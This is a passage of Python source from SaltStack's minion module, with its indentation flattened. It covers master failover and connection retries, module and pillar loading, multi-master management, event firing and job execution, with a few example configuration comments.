opts['master_failback_interval'] = opts['master_alive_interval']
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], str) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
                # we were probably called from the minion's main event loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
if failback:
# failback list of masters to original config
opts['master'] = opts['master_list']
else:
log.info('Moving possibly failed master {0} to the end of'
' the list of masters'.format(opts['master']))
if opts['master'] in opts['local_masters']:
# create new list of master with the possibly failed
# one moved to the end
failed_master = opts['master']
opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x]
opts['master'].append(failed_master)
else:
opts['master'] = opts['master_list']
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
                # If failover is set, the minion has to fail over on DNS errors instead of retrying DNS resolution.
# See issue 21082 for details
if opts['retry_dns']:
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# FIXME: if SMinion don't define io_loop, it can't switch master see #29088
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
tries = opts.get('master_tries', 1)
attempts = 0
resolve_dns_fallback = opts.get('resolve_dns_fallback', False)
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
opts['local_masters'] = copy.copy(opts['master'])
if opts['random_master']:
shuffle(opts['local_masters'])
last_exc = None
opts['master_uri_list'] = list()
# This sits outside of the connection loop below because it needs to set
# up a list of master URIs regardless of which masters are available
# to connect _to_. This is primarily used for masterless mode, when
# we need a list of master URIs to fire calls back to.
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts['master_uri_list'].append(resolve_dns(opts)['master_uri'])
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(1)
attempts += 1
if tries > 0:
log.debug('Connecting to master. Attempt {0} '
'of {1}'.format(attempts, tries)
)
else:
log.debug('Connecting to master. Attempt {0} '
'(infinite attempts)'.format(attempts)
)
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
try:
opts.update(resolve_dns(opts, fallback=resolve_dns_fallback))
except SaltClientError as exc:
last_exc = exc
msg = ('Master hostname: \'{0}\' not found. Trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = copy.copy(opts['local_masters'])
self.opts = opts
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError as exc:
last_exc = exc
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
self.opts['master'] = copy.copy(self.opts['local_masters'])
                        msg = ('No master could be reached or all masters '
                               'denied the minion\'s connection attempt.')
log.error(msg)
# If the code reaches this point, 'last_exc'
# should already be set.
raise last_exc # pylint: disable=E0702
else:
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
if opts['random_master']:
log.warning('random_master is True but there is only one master specified. Ignoring.')
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(1)
attempts += 1
if tries > 0:
log.debug('Connecting to master. Attempt {0} '
'of {1}'.format(attempts, tries)
)
else:
log.debug('Connecting to master. Attempt {0} '
'(infinite attempts)'.format(attempts)
)
opts.update(prep_ip_port(opts))
try:
opts.update(resolve_dns(opts, fallback=resolve_dns_fallback))
if self.opts['transport'] == 'detect':
self.opts['detect_mode'] = True
for trans in ('zeromq', 'tcp'):
if trans == 'zeromq' and not HAS_ZMQ:
continue
self.opts['transport'] = trans
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
if not pub_channel.auth.authenticated:
continue
del self.opts['detect_mode']
break
else:
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
except SaltClientError as exc:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
raise exc
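# Illustrative sketch (hypothetical addresses): a multi-master failover config
# that exercises MinionBase.eval_master() above. With master_type 'failover'
# the minion walks the list until one master accepts the connection, and
# retry_dns is forced to 0 so a DNS failure also moves on to the next master.
#
#     master_type: failover
#     master:
#       - salt1.example.com
#       - salt2.example.com
#     master_alive_interval: 30
#     master_failback: True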
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
if self.opts['transport'] == 'zeromq' and HAS_ZMQ:
io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
io_loop = LOOP_CLASS.current()
io_loop.run_sync(
lambda: self.eval_master(self.opts, failed=True)
)
self.gen_modules(initial_load=True)
# If configured, cache pillar data on the minion
if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
import yaml
pdir = os.path.join(self.opts['cachedir'], 'pillar')
if not os.path.isdir(pdir):
os.makedirs(pdir, 0o700)
ptop = os.path.join(pdir, 'top.sls')
if self.opts['environment'] is not None:
penv = self.opts['environment']
else:
penv = 'base'
cache_top = {penv: {self.opts['id']: ['cache']}}
with salt.utils.fopen(ptop, 'wb') as fp_:
fp_.write(yaml.dump(cache_top))
os.chmod(ptop, 0o600)
cache_sls = os.path.join(pdir, 'cache.sls')
with salt.utils.fopen(cache_sls, 'wb') as fp_:
fp_.write(yaml.dump(self.opts['pillar']))
os.chmod(cache_sls, 0o600)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
# Ensure that a pillar key is set in the opts, otherwise the loader
# will pack a newly-generated empty dict as the __pillar__ dunder, and
# the fact that we compile the pillar below won't matter as it won't be
# packed into any of the modules/functions processed by the loader.
# Below, when pillar data is compiled, we will update this dict with
# the compiled pillar data.
self.opts['pillar'] = {}
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
compiled_pillar = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
funcs=self.functions,
rend=self.rend,
).compile_pillar()
# Update the existing (empty) pillar dict with the compiled pillar
# data. This ensures that the __pillar__ dunder packed into all of the
# functions processed by the loader is not empty.
try:
self.opts['pillar'].update(compiled_pillar)
except TypeError:
log.warning(
'Compiled Pillar data %s is not a dictionary',
compiled_pillar
)
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
    omitted; otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None,
ignore_config_errors=True):
self.opts = salt.config.minion_config(opts['conf_file'], ignore_config_errors=ignore_config_errors)
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionManager(MinionBase):
'''
    Create a multi-minion interface; this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
def __init__(self, opts):
super(MinionManager, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.minions = []
self.jid_queue = []
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
self.process_manager = ProcessManager(name='MultiMinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, async=True)
def __del__(self):
self.destroy()
def _bind(self):
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
io_loop=self.io_loop,
)
self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
self.event.subscribe('')
self.event.set_event_handler(self.handle_event)
@tornado.gen.coroutine
def handle_event(self, package):
yield [minion.handle_event(package) for minion in self.minions]
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return Minion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
masters = self.opts['master']
if self.opts['master_type'] == 'failover' or not isinstance(self.opts['master'], list):
masters = [masters]
for master in masters:
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
minion = self._create_minion_object(s_opts,
s_opts['auth_timeout'],
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
jid_queue=self.jid_queue,
)
self.minions.append(minion)
self.io_loop.spawn_callback(self._connect_minion, minion)
@tornado.gen.coroutine
def _connect_minion(self, minion):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = minion.opts['acceptance_wait_time']
while True:
try:
if minion.opts.get('beacons_before_connect', False):
minion.setup_beacons()
if minion.opts.get('scheduler_before_connect', False):
minion.setup_scheduler()
yield minion.connect_master()
minion.tune_in(start=False)
break
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(minion.opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
log.critical('Unexpected error while connecting to {0}'.format(minion.opts['master']), exc_info=True)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._bind()
# Fire off all the minion coroutines
self._spawn_minions()
# serve forever!
self.io_loop.start()
@property
def restart(self):
for minion in self.minions:
if minion.restart:
return True
return False
def stop(self, signum):
for minion in self.minions:
minion.process_manager.stop_restarting()
minion.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
minion.process_manager.kill_children()
minion.destroy()
def destroy(self):
for minion in self.minions:
minion.destroy()
def reload(self):
for minion in self.minions:
minion.reload()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.connected = False
self.restart = False
# Flag meaning minion has finished initialization including first connect to the master.
# True means the Minion is fully functional and ready to handle events.
self.ready = False
self.jid_queue = jid_queue
self.periodic_callbacks = {}
if io_loop is None:
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')] # pylint: disable=no-member
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
        # Late setup of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
log.info('Creating minion process manager')
self.process_manager = ProcessManager(name='MinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, async=True)
# We don't have the proxy setup yet, so we can't start engines
# Engines need to be able to access __proxy__
if not salt.utils.is_proxy():
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager)
else:
if self.opts.get('beacons_before_connect', False):
log.warning(
'\'beacons_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['beacons_before_connect'] = False
if self.opts.get('scheduler_before_connect', False):
log.warning(
'\'scheduler_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['scheduler_before_connect'] = False
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self._running = False
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
def sync_connect_master(self, timeout=None):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master()
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
future_exception = self._connect_master_future.exc_info()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
def reload(self):
log.info('Minion reloading config')
disk_opts = salt.config.minion_config(os.path.join(salt.syspaths.CONFIG_DIR, 'minion')) # FIXME POC
self.opts = salt.utils.dictupdate.merge_overwrite(self.opts, disk_opts)
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
@tornado.gen.coroutine
def connect_master(self):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check ProxyMinion._post_master_init
to see if those changes need to be propagated.
Minions and ProxyMinions need significantly different post master setups,
which is why the differences are not factored out into separate helper
functions.
'''
if self.connected:
self.opts['master'] = master
# Initialize pillar before loader to make pillar accessible in modules
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
if not self.ready:
self._setup_core()
elif self.connected and self.opts['pillar']:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
if hasattr(self, 'schedule'):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')])
        # add default scheduling jobs to the minion's scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0 and
self.connected):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to {0} seconds'
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
                    'Invalid value (return_retry_timer: {0} or return_retry_timer_max: {1}); '
                    'both must be positive integers'.format(
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
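    # Illustrative sketch (assumed option values): with the config below,
    # _return_retry_timer() returns a random integer in [5, 10]; if
    # return_retry_timer_max is unset or 0, the fixed return_retry_timer value
    # is used instead.
    #
    #     return_retry_timer: 5
    #     return_retry_timer_max: 10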
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False, notify=False, grains=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
        # if this is a *nix system AND modules_max_memory is set, let's enforce
        # a memory limit on module imports
        # this feature ONLY works on *nix-like OSs (the resource module doesn't work on Windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
# This might be a proxy minion
if hasattr(self, 'proxy'):
proxy = self.proxy
else:
proxy = None
if grains is None:
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh, proxy=proxy)
self.utils = salt.loader.utils(self.opts)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(self.opts, functions)
return functions, returners, errors, executors
def _send_req_sync(self, load, timeout):
channel = salt.transport.Channel.factory(self.opts)
return channel.send(load, timeout=timeout)
@tornado.gen.coroutine
def _send_req_async(self, load, timeout):
channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
ret = yield channel.send(load, timeout=timeout)
raise tornado.gen.Return(ret)
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
def timeout_handler(*_):
log.info('fire_master failed: master could not be contacted. Request timed out.')
return True
if sync:
try:
self._send_req_sync(load, timeout)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
return False
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
return True
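    # Illustrative sketch (hypothetical tag and payload): a typical
    # _fire_master() call, which wraps the payload into a '_minion_event' load
    # and ships it to the master over the request channel.
    #
    #     self._fire_master(data={'ok': True}, tag='custom/deploy/done')
    #     # load sent: {'cmd': '_minion_event', 'id': <minion id>, 'tok': <auth token>,
    #     #             'pretag': None, 'data': {'ok': True}, 'tag': 'custom/deploy/done'}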
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
# Don't duplicate jobs
log.trace('Started JIDs: {0}'.format(self.jid_queue))
if self.jid_queue is not None:
if data['jid'] in self.jid_queue:
return
else:
self.jid_queue.append(data['jid'])
if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
self.jid_queue.pop(0)
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
        # We stash an instance reference to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''Return a single context manager for the minion's data
'''
if six.PY2:
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
else:
exitstack = contextlib.ExitStack()
exitstack.enter_context(self.functions.context_dict.clone())
exitstack.enter_context(self.returners.context_dict.clone())
exitstack.enter_context(self.executors.context_dict.clone())
return exitstack
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
Minion._thread_multi_return(minion_instance, opts, data)
else:
Minion._thread_return(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
        This method should be used as a threading target; it starts the actual
        minion-side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
# this minion is blacked out. Only allow saltutil.refresh_pillar
if function_name != 'saltutil.refresh_pillar' and \
function_name not in minion_instance.opts['pillar'].get('minion_blackout_whitelist', []):
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
executors = data.get('module_executors') or opts.get('module_executors', ['direct_call.get'])
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo.get':
if executors[-1] in FUNCTION_EXECUTORS:
executors[-1] = 'sudo.get' # replace
else:
executors.append('sudo.get') # append
log.trace('Executors list {0}'.format(executors)) # pylint: disable=no-member
# Get executors
def get_executor(name):
executor_class = minion_instance.executors.get(name)
if executor_class is None:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return executor_class
# Get the last one that is function executor
executor = get_executor(executors.pop())(opts, data, func, args, kwargs)
# Instantiate others from bottom to the top
for executor_name in reversed(executors):
executor = get_executor(executor_name)(opts, data, executor)
return_data = executor.execute()
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in \'{0}\' had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing \'{0}\': {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(function_name, exc, func.__doc__, )
